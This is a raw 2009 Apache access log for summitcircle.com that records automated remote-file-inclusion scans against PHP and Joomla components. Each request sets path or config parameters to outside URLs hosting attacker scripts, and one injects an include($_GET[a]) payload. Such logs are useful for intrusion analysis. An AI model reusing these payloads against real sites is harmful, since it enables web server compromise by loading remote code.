110.45.144.164 - - [28/Jun/2009:22:27:35 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
110.45.144.164 - - [28/Jun/2009:22:27:36 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
110.45.144.33 - - [28/Jun/2009:22:27:45 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:27:45 -0700] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
110.45.144.33 - - [28/Jun/2009:22:27:45 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
110.45.144.33 - - [28/Jun/2009:22:27:46 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
87.106.54.126 - - [28/Jun/2009:22:28:04 -0700] "GET /logs/access_090222.log/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.106.54.126 - - [28/Jun/2009:22:28:04 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 781 "-" "Mozilla/5.0" "www.summitcircle.com"
87.106.54.126 - - [28/Jun/2009:22:28:04 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5808 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:28:08 -0700] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
124.0.103.194 - - [28/Jun/2009:22:28:31 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
151.1.219.156 - - [28/Jun/2009:22:28:32 -0700] "GET /logs/access_090406.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:28:44 -0700] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
124.0.103.194 - - [28/Jun/2009:22:28:46 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
124.0.103.194 - - [28/Jun/2009:22:28:46 -0700] "GET /logs/access_081208.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:28:46 -0700] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:28:51 -0700] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:28:51 -0700] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
151.1.219.156 - - [28/Jun/2009:22:28:53 -0700] "GET /logs/access_090413.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
65.254.216.47 - - [28/Jun/2009:22:28:59 -0700] "GET /logs/access_090222.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
124.0.103.194 - - [28/Jun/2009:22:29:02 -0700] "GET /logs/access_090209.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:29:02 -0700] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:22:29:24 -0700] "GET /logs/access.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
69.175.14.66 - - [28/Jun/2009:22:29:24 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
69.175.14.66 - - [28/Jun/2009:22:29:24 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
69.175.14.66 - - [28/Jun/2009:22:29:29 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:22:29:29 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:22:29:29 -0700] "GET /logs/access_081201.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:29:40 -0700] "GET /logs/access_090119.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:29:47 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:29:48 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:29:59 -0700] "GET /logs/access_090119.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:30:01 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
151.1.219.156 - - [28/Jun/2009:22:30:03 -0700] "GET /logs/access_090406.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:30:11 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
81.177.9.20 - - [28/Jun/2009:22:30:20 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5808 "-" "Mozilla/5.0" "www.summitcircle.com"
81.177.9.20 - - [28/Jun/2009:22:30:20 -0700] "GET /logs/access_090222.log/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
81.177.9.20 - - [28/Jun/2009:22:30:20 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 781 "-" "Mozilla/5.0" "www.summitcircle.com"
94.23.2.21 - - [28/Jun/2009:22:30:26 -0700] "GET /logs/access_081201.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
94.23.2.21 - - [28/Jun/2009:22:30:26 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
94.23.2.21 - - [28/Jun/2009:22:30:26 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:30:27 -0700] "GET /logs/access_090119.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.106.54.126 - - [28/Jun/2009:22:30:28 -0700] "GET /logs/access_090222.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:30:37 -0700] "GET /logs/access_090119.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:30:37 -0700] "GET /logs/access_090119.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:30:38 -0700] "GET /logs/access_090119.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:30:38 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:30:47 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:30:47 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:30:50 -0700] "GET /logs/access_090119.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:31:00 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:31:02 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:22:31:22 -0700] "GET /logs/phphtml.php?htmlclass_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:22:31:22 -0700] "GET /logs/access_090222.log%20/phphtml.php?htmlclass_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:22:31:22 -0700] "GET /phphtml.php?htmlclass_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.220.213.203 - - [28/Jun/2009:22:31:26 -0700] "GET /logs/access_081208.log%20%20/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
210.220.213.203 - - [28/Jun/2009:22:31:26 -0700] "GET /logs/access_090209.log%20%20/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
81.177.9.20 - - [28/Jun/2009:22:32:33 -0700] "GET /logs/access_090222.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
124.0.103.194 - - [28/Jun/2009:22:32:38 -0700] "GET /logs/access_081208.log%20%20/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
124.0.103.194 - - [28/Jun/2009:22:32:38 -0700] "GET /logs/access_090209.log%20%20/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:34:40 -0700] "GET /logs/access_090413.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:34:55 -0700] "GET /logs/access_090413.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:35:33 -0700] "GET /logs/access_090413.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
210.220.213.203 - - [28/Jun/2009:22:36:07 -0700] "GET /logs/access_090413.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
72.82.228.83 - - [28/Jun/2009:22:36:08 -0700] "GET /logs/access.log//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
110.45.144.33 - - [28/Jun/2009:22:36:12 -0700] "GET /logs/access_081201.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:36:21 -0700] "GET /logs/access_090413.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
110.45.144.33 - - [28/Jun/2009:22:36:22 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
110.45.144.33 - - [28/Jun/2009:22:36:23 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
72.82.228.83 - - [28/Jun/2009:22:36:34 -0700] "GET /logs/access.log//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
59.125.5.1 - - [28/Jun/2009:22:36:35 -0700] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "summitcircle.com"
59.125.5.1 - - [28/Jun/2009:22:36:35 -0700] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "summitcircle.com"
59.125.5.1 - - [28/Jun/2009:22:36:35 -0700] "GET /logs/access.log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:36:47 -0700] "GET /logs/access_090413.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:22:37:20 -0700] "GET /logs/access_090413.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
209.172.33.230 - - [28/Jun/2009:22:38:17 -0700] "GET /logs/access.log%20%20//index.php?sayfa=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
209.172.33.230 - - [28/Jun/2009:22:38:17 -0700] "GET /logs//index.php?sayfa=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
209.172.33.230 - - [28/Jun/2009:22:38:17 -0700] "GET /index.php?sayfa=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:38:38 -0700] "GET /logs/access_090202.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:38:38 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:38:38 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:38:56 -0700] "GET /logs/access_090202.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:38:56 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:38:56 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:22:39:36 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:22:39:36 -0700] "GET /logs/access_090406.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:22:39:36 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:40:36 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:22:40:36 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
194.165.34.49 - - [28/Jun/2009:22:41:17 -0700] "GET /logs/access_090413.log//modules/vwar/admin/admin.php?vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:22:41:43 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:22:41:43 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:22:41:43 -0700] "GET /logs/access_090406.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:22:41:50 -0700] "GET /logs/access_090222.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:22:42:11 -0700] "GET /logs/access_090222.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
